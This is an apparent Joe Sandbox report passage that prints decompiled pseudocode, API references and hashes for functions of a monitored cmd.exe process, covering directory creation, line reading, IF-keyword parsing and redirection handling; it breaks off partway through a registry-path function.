0x00d8bffa
0x00d8c00b
0x00d8c00b
0x00d8bfaf
0x00d8bfb4
0x00d9a3d9
0x00d9a3d9
0x00d8bfba
0x00d8bfc6
0x00d8bfce
0x00d9a3e4
0x00000000
0x00d8bfd4
0x00d8bfd9
0x00d9a3f8
0x00d9a3f9
0x00d9a3fa
0x00d9a408
0x00d9a408
0x00000000
0x00d9a40d
0x00d8bfe9
0x00d8c00e
0x00d8c019
0x00d9a401
0x00d9a402
0x00d9a403
0x00000000
0x00d9a403
0x00d8c022
0x00000000
0x00000000
0x00d8c02f
0x00d8c0d7
0x00d8c0d7
0x00d8c0d8
0x00000000
0x00d8c0d8
0x00d8c035
0x00d8c038
0x00d8c03c
0x00d9a415
0x00d9a415
0x00d8c044
0x00d8c047
0x00d8c048
0x00d8c052
0x00d9a42b
0x00d9a42f
0x00d9a431
0x00d9a431
0x00d9a43a
0x00000000
0x00d9a440
0x00d9a440
0x00d9a444
0x00d9a446
0x00d9a446
0x00d9a450
0x00000000
0x00d9a456
0x00d9a456
0x00d9a45a
0x00d9a45c
0x00d9a45c
0x00d9a462
0x00d9a465
0x00d9a46b
0x00d9a46d
0x00d9a473
0x00d9a4a2
0x00d9a4a5
0x00d9a4a7
0x00d9a4aa
0x00d9a4b0
0x00d9a4b0
0x00d9a4b2
0x00d9a4b8
0x00000000
0x00000000
0x00d9a4be
0x00d9a4c4
0x00d9a4c6
0x00d9a4c6
0x00d9a4cf
0x00000000
0x00000000
0x00d9a4d1
0x00d9a4d4
0x00d9a4da
0x00d9a4dc
0x00d9a4df
0x00d9a4e5
0x00d9a4ea
0x00000000
0x00000000
0x00d9a4ec
0x00000000
0x00d9a4ec
0x00d9a4f0
0x00d9a4f4
0x00000000
0x00000000
0x00d9a4fa
0x00000000
0x00d9a4fa
0x00d9a477
0x00d9a479
0x00d9a47b
0x00d9a47c
0x00d9a47c
0x00d9a481
0x00000000
0x00000000
0x00d9a483
0x00d9a486
0x00d9a48c
0x00d9a48e
0x00d9a491
0x00d9a493
0x00d9a498
0x00000000
0x00000000
0x00000000
0x00d9a498
0x00d9a49a
0x00d9a49f
0x00d9a4a0
0x00000000
0x00d9a4a0
0x00d9a450
0x00d8c058
0x00d8c058
0x00d8c05c
0x00d9a420
0x00d9a420
0x00d8c062
0x00d8c07c
0x00d8c07c
0x00d8c07c
0x00d8c082
0x00d8c082
0x00d8c082
0x00d8c088
0x00000000
0x00000000
0x00000000
0x00000000
0x00d8c08a
0x00d8c08a
0x00d8c08c
0x00d8c090
0x00000000
0x00000000
0x00d8c092
0x00d8c095
0x00d8c09b
0x00d8c09e
0x00d8c0a3
0x00000000
0x00000000
0x00d8c0a7
0x00d8c0ab
0x00000000
0x00000000
0x00d8c0b2
0x00d8c0b4
0x00d8c0b7
0x00d8c0bc
0x00d8c0f8
0x00d8c0f8
0x00d8c0c8
0x00d8c06d
0x00d8c076
0x00d8c079
0x00000000
0x00000000
0x00000000
0x00000000
0x00d8c0c8
0x00d8c0b1
0x00000000
0x00d8c0b1
0x00d8c0df
0x00d8c0e1
0x00d8c100
0x00d8c100
0x00d8c0ed
0x00000000
0x00d8c0f3
0x00d9a502
0x00d9a50d
0x00000000
0x00d9a513
0x00000000
0x00d9a513
0x00d9a50d
0x00d8c0ed
0x00d8c07c
0x00d8c052
0x00d8bfeb
0x00000000
0x00d8bfeb
0x00d8bfce
0x00d8bf54
0x00d8bf5e
0x00d9a3c2
0x00d9a3c4
0x00d9a3c6
0x00d9a3ce
0x00000000
0x00d9a3ce
0x00000000

APIs

memset.MSVCRT ref: 00D8BF80
GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,-00000105), ref: 00D8BFC6
CreateDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000), ref: 00D8BFE1
??_V@YAXPAX@Z.MSVCRT ref: 00D8BFF2

Part of subcall function 00D929BB: GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(00D90B22,00D90B22,00007FE7), ref: 00D929E9

GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00D8C00E
CreateDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000), ref: 00D8C0C0
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00D8C0CA
CreateDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000), ref: 00D8C0E5
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00D9A502

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: CreateDirectoryErrorLast$DriveFullNamePathTypememset
String ID:
API String ID: 402963468-0
Opcode ID: 1c605172e4f9313ce337759a734c3cd6806989618c94ce29a3188fd222aa3af7
Instruction ID: 273a83dc3027a103c25f7616ef1184577f4b0fc84865b9a77d53f523281ececa
Opcode Fuzzy Hash: 1c605172e4f9313ce337759a734c3cd6806989618c94ce29a3188fd222aa3af7
Instruction Fuzzy Hash: 4A81E631A00216DBDF24EF99DC59ABAB7B4EF48750F188065E50AD7290E770CD80DBB1

Uniqueness

Uniqueness Score: -1.00%

Function 00DA396E, Relevance: 15.2, APIs: 10, Instructions: 153
fileCOMMON

Download Yara Rule

C-Code - Quality: 45%

			E00DA396E(void* __ecx, short* __edx, long _a4, DWORD* _a8) {
				long _v8;
				char* _v12;
				long _v16;
				void* _v20;
				int _v24;
				short* _v28;
				int _t36;
				signed int _t38;
				int _t41;
				int _t52;
				void* _t54;
				char* _t55;
				int _t57;
				int _t58;
				void _t60;
				int _t62;
				void* _t65;
				DWORD* _t67;

				_t65 = __ecx;
				_v28 = __edx;
				_v20 = __ecx;
				_t54 = 0xdad620;
				_v16 = SetFilePointer(__ecx, 0, 0, 1);
				if(_a4 >= 0x1fff) {
					_a4 = 0x1fff;
				}
				__imp__AcquireSRWLockShared(0xdc7f20);
				_t36 = ReadFile(_t65, _t54, _a4, _a8, 0);
				__imp__ReleaseSRWLockShared(0xdc7f20);
				if(_t36 != 0) {
					_t67 = _a8;
					_t62 =  *_t67;
					if(_t62 == 0) {
						goto L3;
					}
					_t57 = _t62;
					_v8 = _t62;
					if( *0xdb3854 == 0xfde9 && _v16 == 0 && _a4 > 3) {
						_push(3);
						_push(0xd83270);
						_push(_t54);
						L00D982C7();
						_t57 = _t62;
						if(_t36 == 0) {
							_t62 = _t62 + 0xfffffffd;
							_v16 = 3;
							_t54 = 0xdad623;
							 *_t67 = _t62;
							_v8 = _t62;
							_t57 = _t62;
						}
					}
					_v12 = _t54;
					if(_t62 <= 0) {
						L21:
						_t55 = _v12;
						goto L22;
					} else {
						do {
							if(_t57 < 3) {
								L16:
								if( *((char*)(( *_t54 & 0x000000ff) + 0xdc7f30)) == 0) {
									_t57 = _t57 - 1;
									goto L20;
								}
								if(_t57 == 1) {
									__imp__AcquireSRWLockShared(0xdc7f20);
									_t28 = _t54 + 1; // 0xdad621
									_t52 = ReadFile(_v20, _t28, 1,  &_v8, 0);
									__imp__ReleaseSRWLockShared(0xdc7f20);
									if(_t52 == 0 || _v8 == 0) {
										 *_a8 =  *_a8 & 0x00000000;
										goto L3;
									} else {
										_t67 = _a8;
										_t62 = _t62 + 1;
										goto L21;
									}
								}
								_push(2);
								_t57 = _t57 + 0xfffffffe;
								_pop(1);
								goto L20;
							}
							_t60 =  *_t54;
							if(_t60 != 0xa ||  *(_t54 + 1) != 0xd) {
								_v24 = _t57;
								if(_t60 != 0xd ||  *(_t54 + 1) != 0xa) {
									goto L16;
								} else {
									goto L24;
								}
							} else {
								L24:
								 *((char*)(_t54 + 2)) = 0;
								_t55 = _v12;
								_t62 = _t54 - _t55 + 2;
								SetFilePointer(_v20, _v16 + _t62, 0, 0);
								L22:
								_t58 =  *0xdb3854;
								_t38 = E00D90638(_t58);
								asm("sbb eax, eax");
								_t41 = MultiByteToWideChar(_t58,  ~( ~_t38), _t55, _t62, _v28, _a4);
								 *_t67 = _t41;
								return _t41;
							}
							L20:
							_t54 = _t54 + 1;
							_v8 = _t57;
						} while (_t57 > 0);
						goto L21;
					}
				} else {
					L3:
					return 0;
				}
			}

0x00da397d
0x00da397f
0x00da3985
0x00da3988
0x00da3993
0x00da399e
0x00da39a0
0x00da39a0
0x00da39a9
0x00da39ba
0x00da39c3
0x00da39cb
0x00da39d4
0x00da39d7
0x00da39db
0x00000000
0x00000000
0x00da39e7
0x00da39e9
0x00da39ec
0x00da39fa
0x00da39fc
0x00da3a01
0x00da3a02
0x00da3a0a
0x00da3a0e
0x00da3a10
0x00da3a13
0x00da3a1a
0x00da3a1f
0x00da3a21
0x00da3a24
0x00da3a24
0x00da3a0e
0x00da3a26
0x00da3a2b
0x00da3a75
0x00da3a75
0x00000000
0x00da3a2d
0x00da3a2d
0x00da3a30
0x00da3a4f
0x00da3a59
0x00da3a6a
0x00000000
0x00da3a6b
0x00da3a5e
0x00da3acb
0x00da3ad9
0x00da3ae0
0x00da3aed
0x00da3af5
0x00da3b09
0x00000000
0x00da3afd
0x00da3afd
0x00da3b00
0x00000000
0x00da3b00
0x00da3af5
0x00da3a60
0x00da3a62
0x00da3a65
0x00000000
0x00da3a65
0x00da3a32
0x00da3a37
0x00da3a3f
0x00da3a47
0x00000000
0x00000000
0x00000000
0x00000000
0x00da3aa4
0x00da3aa4
0x00da3aa9
0x00da3aac
0x00da3ab5
0x00da3abe
0x00da3a78
0x00da3a78
0x00da3a7e
0x00da3a8b
0x00da3a93
0x00da3a99
0x00000000
0x00da3a99
0x00da3a6c
0x00da3a6c
0x00da3a6e
0x00da3a71
0x00000000
0x00da3a2d
0x00da39cd
0x00da39cd
0x00000000
0x00da39cd

APIs

SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000000,00000001,0000000A,00000000,00000001,?,00DA3B43,?,?,?,00DA977C), ref: 00DA398D
AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00DC7F20,?,00DA3B43,?,?,?,00DA977C), ref: 00DA39A9
ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00DAD620,?,?,00000000,?,00DA3B43,?,?,?,00DA977C), ref: 00DA39BA
ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00DC7F20,?,00DA3B43,?,?,?,00DA977C), ref: 00DA39C3
memcmp.MSVCRT ref: 00DA3A02
MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(?,00000000,?,00DC7F20,?,?,?,00DA3B43,?,?,?,00DA977C), ref: 00DA3A93
SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,00000000,?,00DA3B43,?,?,?,00DA977C), ref: 00DA3ABE
AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00DC7F20,?,00DA3B43,?,?,?,00DA977C), ref: 00DA3ACB
ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(?,00DAD621,00000001,00DA977C,00000000,?,00DA3B43,?,?,?,00DA977C), ref: 00DA3AE0
ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00DC7F20,?,00DA3B43,?,?,?,00DA977C), ref: 00DA3AED

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: FileLockShared$AcquirePointerReadRelease$ByteCharMultiWidememcmp
String ID:
API String ID: 2002953238-0
Opcode ID: a7fb81419bf0a8f324eb14b95c2c3a3bcd271a9ab3469f9a038b45cb6c7a7ee2
Instruction ID: b800c541d49ce9a4ceff00074b169a8b7bc95ef976edbfbc552df04a664ace98
Opcode Fuzzy Hash: a7fb81419bf0a8f324eb14b95c2c3a3bcd271a9ab3469f9a038b45cb6c7a7ee2
Instruction Fuzzy Hash: E151A372A44316BFDB218F58CC89BA9BBBAEF56710F184159F885DB290C7708E40CB71

Uniqueness

Uniqueness Score: -1.00%

Function 00D8CDA2, Relevance: 15.1, APIs: 5, Strings: 5, Instructions: 97
COMMON

Download Yara Rule

C-Code - Quality: 32%

			E00D8CDA2(void* __ecx) {
				void* __ebp;
				void* _t2;
				signed int _t4;
				intOrPtr _t6;
				void* _t18;
				void* _t23;
				void* _t33;
				intOrPtr* _t36;

				_push(__ecx);
				_t33 = __ecx;
				_t2 = E00D8F030(0);
				_t40 = _t2 - 0x4000;
				if(_t2 != 0x4000) {
					E00DA82EB(0);
				}
				_t4 = E00D8E9A0(0, _t40);
				_t36 = _t4;
				__imp___wcsicmp(L"ERRORLEVEL", 0xdbfaa0);
				_pop(_t18);
				if(_t4 == 0) {
					 *_t36 = 0x35;
					goto L14;
				} else {
					__imp___wcsicmp(L"EXIST", 0xdbfaa0);
					_pop(_t18);
					if(_t4 == 0) {
						 *_t36 = 0x37;
						L14:
						_t6 = E00D8EA40(E00D8DDCD(_t18, _t18, 0), 0);
						L12:
						 *((intOrPtr*)(_t36 + 0x3c)) = _t6;
						L9:
						return _t36;
					}
					if( *0xdc3cc9 == 0) {
						L7:
						__imp___wcsicmp(L"NOT", 0xdbfaa0);
						_pop(_t23);
						if(_t4 == 0) {
							__eflags = _t33;
							if(_t33 != 0) {
								E00DA82EB(_t23);
							}
							 *_t36 = 0x38;
							__eflags = 1;
							_t6 = E00D8CDA2(1);
							goto L12;
						}
						E00D8F300(_t4, 0, 0, 0);
						 *_t36 = 0x39;
						E00D89520(_t36);
						goto L9;
					}
					__imp___wcsicmp(L"CMDEXTVERSION", 0xdbfaa0);
					_pop(_t18);
					if(_t4 == 0) {
						 *_t36 = 0x34;
						goto L14;
					}
					if( *0xdc3cc9 == 0) {
						goto L7;
					}
					__imp___wcsicmp(L"DEFINED", 0xdbfaa0);
					_pop(_t18);
					if(_t4 == 0) {
						 *_t36 = 0x36;
						goto L14;
					}
					goto L7;
				}
			}

0x00d8cdaa
0x00d8cdae
0x00d8cdb2
0x00d8cdb7
0x00d8cdbc
0x00d9b3f9
0x00d9b3f9
0x00d8cdc4
0x00d8cdce
0x00d8cdd6
0x00d8cddd
0x00d8cde0
0x00d9b403
0x00000000
0x00d8cde6
0x00d8cdec
0x00d8cdf3
0x00d8cdf6
0x00d8ce9a
0x00d8ce86
0x00d8ce93
0x00d8ce7b
0x00d8ce7b
0x00d8ce60
0x00d8ce68
0x00d8ce68
0x00d8ce03
0x00d8ce36
0x00d8ce3c
0x00d8ce43
0x00d8ce46
0x00d8ce69
0x00d8ce6b
0x00d8cea2
0x00d8cea2
0x00d8ce6f
0x00d8ce75
0x00d8ce76
0x00000000
0x00d8ce76
0x00d8ce4e
0x00d8ce55
0x00d8ce5b
0x00000000
0x00d8ce5b
0x00d8ce0b
0x00d8ce12
0x00d8ce15
0x00d9b40e
0x00000000
0x00d9b40e
0x00d8ce22
0x00000000
0x00000000
0x00d8ce2a
0x00d8ce31
0x00d8ce34
0x00d8ce80
0x00000000
0x00d8ce80
0x00000000
0x00d8ce34

APIs

_wcsicmp.MSVCRT ref: 00D8CDD6
_wcsicmp.MSVCRT ref: 00D8CDEC
_wcsicmp.MSVCRT ref: 00D8CE0B
_wcsicmp.MSVCRT ref: 00D8CE2A
_wcsicmp.MSVCRT ref: 00D8CE3C

Strings

ERRORLEVEL, xrefs: 00D8CDD1
CMDEXTVERSION, xrefs: 00D8CE06
DEFINED, xrefs: 00D8CE25
NOT, xrefs: 00D8CE37
EXIST, xrefs: 00D8CDE7

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: _wcsicmp
String ID: CMDEXTVERSION$DEFINED$ERRORLEVEL$EXIST$NOT
API String ID: 2081463915-1668778490
Opcode ID: 30cd34311c9cec809f5f57f123f3365174dc2000f29c739b5ecd8fb963f6ca86
Instruction ID: d509b416463f7dd6b72209637b1a4903d41a6e4d08786f7db68fe6e7ff503417
Opcode Fuzzy Hash: 30cd34311c9cec809f5f57f123f3365174dc2000f29c739b5ecd8fb963f6ca86
Instruction Fuzzy Hash: 89219171214702DAEB393B75A81AB3AA6C9DB847A0F24542FF492D12C1EF75C800C779

Uniqueness

Uniqueness Score: -1.00%

Function 00D8D97E, Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 268
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E00D8D97E(signed int* __ecx, signed int __edx) {
				signed int _v8;
				long _v20;
				char _v24;
				int _v28;
				void _v548;
				signed int _v552;
				signed int* _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int* _t68;
				signed int _t75;
				signed int _t76;
				WCHAR* _t80;
				WCHAR* _t83;
				void* _t89;
				void* _t90;
				signed int _t92;
				void* _t93;
				WCHAR* _t95;
				WCHAR* _t103;
				WCHAR* _t110;
				void* _t116;
				signed int _t120;
				signed int _t123;
				void* _t128;
				signed int _t129;
				signed int _t130;
				void* _t133;
				signed int _t135;
				signed int _t136;
				signed int _t137;

				_t124 = __edx;
				_t56 =  *0xdad0b4; // 0x35c4fbb8
				_v8 = _t56 ^ _t137;
				_t134 = 0x104;
				_v552 = __edx;
				_t95 = 0;
				_v24 = 1;
				_v28 = 0;
				_t129 = __ecx;
				_v20 = 0x104;
				_v556 = __ecx;
				memset( &_v548, 0, 0x104);
				if(E00D90C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					L33:
					_t95 = 1;
					L30:
					__imp__??_V@YAXPAX@Z();
					return E00D96FD0(_t95, _t95, _v8 ^ _t137, _t124, _t129, _t134, _v28);
				}
				_t135 =  *(_t129 + 0x34);
				if(_t135 == 0) {
					L11:
					_t134 = _v552;
					if(_t134 == 3) {
						_t68 =  *0xdc3cd4;
						_v556 = _t68;
						L14:
						_t129 =  *(_t129 + 0x34);
						if(_t129 == 0) {
							goto L30;
						}
						_t134 = _t134 | 0xffffffff;
						do {
							if( *(_t129 + 8) != _t95) {
								goto L29;
							}
							__imp___get_osfhandle( *_t129);
							if(_t68 == _t134) {
								L39:
								 *(_t129 + 8) = _t134;
								L22:
								_t103 =  *(_t129 + 4);
								if( *_t103 == 0x26) {
									_t103[2] = 0;
									_t124 =  *_t129;
									_t105 = (( *(_t129 + 4))[1] & 0x0000ffff) - 0x30;
									if(E00D8DBFC((( *(_t129 + 4))[1] & 0x0000ffff) - 0x30,  *_t129) != _t134) {
										goto L29;
									}
									L52:
									E00D8D937();
									_t134 = 0xdc3d00;
									E00D9274C(0xdc3d00, 0x104, L"%d",  *_t129);
									E00D8C5A2(_t105, 0x2344, 1, 0xdc3d00);
									goto L33;
								}
								_push(_t103);
								if( *((short*)(_t129 + 0x10)) == 0x3c) {
									_t124 = 0x8000;
									_t75 = E00D8D120(_t103, 0x8000);
									_v552 = _t75;
									if(_t75 != _t134) {
										L26:
										if(_t75 !=  *_t129) {
											_t124 =  *_t129;
											_t76 = E00D8DBFC(_t75,  *_t129);
											_t105 = _v552;
											_t136 = _t76;
											E00D8DB92(_v552);
											if(_t136 == 0xffffffff) {
												goto L52;
											}
											_t75 =  *_t129;
											_t134 = _t136 | 0xffffffff;
										}
										if(_t75 == _t134) {
											L53:
											E00D8D937();
											E00DA985A( *0xdc3cf0);
											goto L33;
										}
										_v556[1] = _t75;
										goto L29;
									}
									_t80 = E00D93320(L"DPATH");
									if(_t80 == 0) {
										goto L53;
									}
									_t110 = _v28;
									if(_t110 == 0) {
										_t110 =  &_v548;
									}
									if(SearchPathW(_t80,  *(_t129 + 4), _t95, _v20, _t110, _t95) == 0) {
										goto L53;
									} else {
										_t103 = _v28;
										if(_t103 == 0) {
											_t103 =  &_v548;
										}
										_push(_t103);
										_t124 = 0x8000;
										L25:
										_t75 = E00D8D120(_t103, _t124);
										_v552 = _t75;
										if(_t75 == _t134) {
											goto L53;
										}
										goto L26;
									}
								}
								asm("sbb edx, edx");
								_t124 = ( ~( *(_t129 + 0xc)) & 0xfffffe09) + 0x301;
								goto L25;
							}
							__imp___get_osfhandle( *_t129);
							if(_t68 == 0xfffffffe) {
								goto L39;
							}
							if(E00D90178(_t68) == 0) {
								_t82 = E00DA9953(_t82,  *_t129);
								if(_t82 != 0) {
									goto L20;
								}
								__imp___get_osfhandle( *_t129, _t95, _t95, 1);
								_pop(_t114);
								if(_t82 != _t134) {
									goto L20;
								}
								_t134 = 0xdc3d00;
								E00D9274C(0xdc3d00, 0x104, L"%d",  *_t129);
								_push(0xdc3d00);
								_push(1);
								_push(0x40002721);
								L51:
								E00D8C5A2(_t114);
								 *(_t129 + 8) = _t95;
								E00D8D937();
								goto L33;
							}
							L20:
							_t114 =  *_t129;
							_t83 = E00D8DBCE(_t82,  *_t129);
							 *(_t129 + 8) = _t83;
							if(_t83 == _t134) {
								_t134 = 0xdc3d00;
								E00D9274C(0xdc3d00, 0x104, L"%d",  *_t129);
								_push(0xdc3d00);
								_push(1);
								_push(0x2344);
								goto L51;
							}
							E00D8DB92( *_t129);
							goto L22;
							L29:
							_t68 =  *(_t129 + 0x14);
							_t129 = _t68;
						} while (_t68 != 0);
						goto L30;
					}
					_t116 = 0x10;
					_t68 = E00D900B0(_t116);
					_v556 = _t68;
					if(_t68 == 0) {
						goto L33;
					}
					_t68[3] =  *0xdc3cd4;
					 *0xdc3cd4 = _t68;
					_t68[2] = _t129;
					 *_t68 = _t134;
					goto L14;
				} else {
					goto L2;
				}
				do {
					L2:
					_t118 =  *(_t135 + 4);
					_t130 =  *(_t135 + 4);
					_t128 = _t130 + 2;
					do {
						_t89 =  *_t130;
						_t130 = _t130 + 2;
					} while (_t89 != _t95);
					_t90 = E00D922C0(_t95, _t118);
					_t124 = (_t130 - _t128 >> 1) + 1;
					E00D91040( *(_t135 + 4), (_t130 - _t128 >> 1) + 1, _t90);
					if( *((intOrPtr*)(_t135 + 8)) != _t95) {
						goto L9;
					}
					_t124 =  *(_t135 + 4);
					_t120 = _t124;
					_t133 = _t120 + 2;
					do {
						_t93 =  *_t120;
						_t120 = _t120 + 2;
					} while (_t93 != _t95);
					_t123 = (_t120 - _t133 >> 1) - 1;
					if(_t123 > 1 &&  *((short*)(_t124 + _t123 * 2)) == 0x3a) {
						 *((short*)(_t124 + _t123 * 2)) = 0;
					}
					L9:
					_t92 =  *(_t135 + 0x14);
					_t135 = _t92;
				} while (_t92 != 0);
				_t129 = _v556;
				goto L11;
			}

0x00d8d97e
0x00d8d989
0x00d8d990
0x00d8d996
0x00d8d99b
0x00d8d9a1
0x00d8d9a3
0x00d8d9ae
0x00d8d9b1
0x00d8d9b3
0x00d8d9b8
0x00d8d9be
0x00d8d9e4
0x00d8db8d
0x00d8db8f
0x00d8db50
0x00d8db53
0x00d8db6c
0x00d8db6c
0x00d8d9ea
0x00d8d9ef
0x00d8da55
0x00d8da55
0x00d8da5e
0x00d9ba31
0x00d9ba36
0x00d8da8d
0x00d8da8d
0x00d8da92
0x00000000
0x00000000
0x00d8da98
0x00d8da9b
0x00d8da9e
0x00000000
0x00000000
0x00d8daa6
0x00d8daaf
0x00d9ba90
0x00d9ba90
0x00d8daef
0x00d8daef
0x00d8daf6
0x00d8db6f
0x00d8db76
0x00d8db7c
0x00d8db86
0x00000000
0x00000000
0x00d9bb58
0x00d9bb58
0x00d9bb5f
0x00d9bb6f
0x00d9bb7c
0x00000000
0x00d9bb81
0x00d8dafd
0x00d8dafe
0x00d9ba98
0x00d9ba9d
0x00d9baa2
0x00d9baaa
0x00d8db2a
0x00d8db2c
0x00d9baff
0x00d9bb03
0x00d9bb08
0x00d9bb0e
0x00d9bb10
0x00d9bb18
0x00000000
0x00000000
0x00d9bb1a
0x00d9bb1c
0x00d9bb1c
0x00d8db34
0x00d9bb89
0x00d9bb89
0x00d9bb94
0x00000000
0x00d9bb94
0x00d8db40
0x00000000
0x00d8db40
0x00d9bab5
0x00d9babc
0x00000000
0x00000000
0x00d9bac2
0x00d9bac7
0x00d9bac9
0x00d9bac9
0x00d9bae1
0x00000000
0x00d9bae7
0x00d9bae7
0x00d9baec
0x00d9baee
0x00d9baee
0x00d9baf4
0x00d9baf5
0x00d8db17
0x00d8db17
0x00d8db1c
0x00d8db24
0x00000000
0x00000000
0x00000000
0x00d8db24
0x00d9bae1
0x00d8db09
0x00d8db11
0x00000000
0x00d8db11
0x00d8dab7
0x00d8dac1
0x00000000
0x00000000
0x00d8dad0
0x00d9ba43
0x00d9ba4a
0x00000000
0x00000000
0x00d9ba56
0x00d9ba5c
0x00d9ba66
0x00000000
0x00000000
0x00d9ba6e
0x00d9ba7e
0x00d9ba83
0x00d9ba84
0x00d9ba86
0x00d9bb43
0x00d9bb43
0x00d9bb4b
0x00d9bb4e
0x00000000
0x00d9bb4e
0x00d8dad6
0x00d8dad6
0x00d8dad8
0x00d8dadd
0x00d8dae2
0x00d9bb26
0x00d9bb36
0x00d9bb3b
0x00d9bb3c
0x00d9bb3e
0x00000000
0x00d9bb3e
0x00d8daea
0x00000000
0x00d8db43
0x00d8db43
0x00d8db46
0x00d8db48
0x00000000
0x00d8da9b
0x00d8da66
0x00d8da67
0x00d8da6c
0x00d8da74
0x00000000
0x00000000
0x00d8da80
0x00d8da83
0x00d8da88
0x00d8da8b
0x00000000
0x00000000
0x00000000
0x00000000
0x00d8d9f1
0x00d8d9f1
0x00d8d9f1
0x00d8d9f4
0x00d8d9f6
0x00d8d9f9
0x00d8d9f9
0x00d8d9fc
0x00d8d9ff
0x00d8da08
0x00d8da10
0x00d8da14
0x00d8da1c
0x00000000
0x00000000
0x00d8da1e
0x00d8da21
0x00d8da23
0x00d8da26
0x00d8da26
0x00d8da29
0x00d8da2c
0x00d8da35
0x00d8da39
0x00d9ba28
0x00d9ba28
0x00d8da46
0x00d8da46
0x00d8da49
0x00d8da4b
0x00d8da4f
0x00000000

APIs

memset.MSVCRT ref: 00D8D9BE

Part of subcall function 00D90C70: ??_V@YAXPAX@Z.MSVCRT ref: 00D90CBA
Part of subcall function 00D90C70: memset.MSVCRT ref: 00D90CDD

_get_osfhandle.MSVCRT ref: 00D8DAA6
_get_osfhandle.MSVCRT ref: 00D8DAB7
??_V@YAXPAX@Z.MSVCRT ref: 00D8DB53

Strings

DPATH, xrefs: 00D9BAB0

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: _get_osfhandlememset
String ID: DPATH
API String ID: 3784859044-2010427443
Opcode ID: 4b79aa22553138cbc7a70913c3bc4228617a31f0ef42e1ad80ae55377883fd7a
Instruction ID: 399c04740326e8ce9a3a26082c1dfdaad2211e4b5e6b496d26c6729901517ccc
Opcode Fuzzy Hash: 4b79aa22553138cbc7a70913c3bc4228617a31f0ef42e1ad80ae55377883fd7a
Instruction Fuzzy Hash: EA91F431A00212AFCF24BF64DD85AAAB7B6FF44720F29415AE519972D1DB70ED50CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 00DA59E6, Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 211
registryCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E00DA59E6(void* __ecx, signed int __edx, char* _a4) {
				signed int _v8;
				short _v528;
				signed int _v532;
				void* _v536;
				void* _v540;
				long _v544;
				int _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t39;
				intOrPtr _t41;
				short* _t44;
				signed short* _t52;
				char _t55;
				signed short _t62;
				long _t67;
				signed short _t69;
				signed int _t71;
				short* _t73;
				signed int _t75;
				char* _t85;
				void* _t88;
				signed short _t90;
				char* _t93;
				intOrPtr* _t94;
				signed short* _t98;
				void* _t99;
				signed int _t100;

				_t39 =  *0xdad0b4; // 0x35c4fbb8
				_v8 = _t39 ^ _t100;
				_t75 = __edx;
				_v540 = __ecx;
				_t94 = __edx;
				_v532 = __edx;
				_t93 = _a4;
				_t90 = __edx + 2;
				do {
					_t41 =  *_t94;
					_t94 = _t94 + 2;
				} while (_t41 != 0);
				if((_t94 - _t90 >> 1) + 0x14 <= 0x104) {
					E00D91040( &_v528, 0x104, __edx);
					_t90 = 0x104;
					_t44 =  &_v528;
					while( *_t44 != 0) {
						_t44 = _t44 + 2;
						_t90 = _t90 - 1;
						if(_t90 != 0) {
							continue;
						}
						break;
					}
					asm("sbb ecx, ecx");
					_t82 =  ~_t90 & 0x00000104 - _t90;
					if(_t90 != 0) {
						_t73 =  &(( &_v528)[_t82]);
						_t99 = 0x104 - _t82;
						if(_t99 == 0) {
							L15:
							_t73 = _t73 - 2;
						} else {
							_t88 = 0x7ffffffe;
							_t90 = L"\\Shell\\Open\\Command" - _t73;
							while(_t88 != 0) {
								_t75 = _v532;
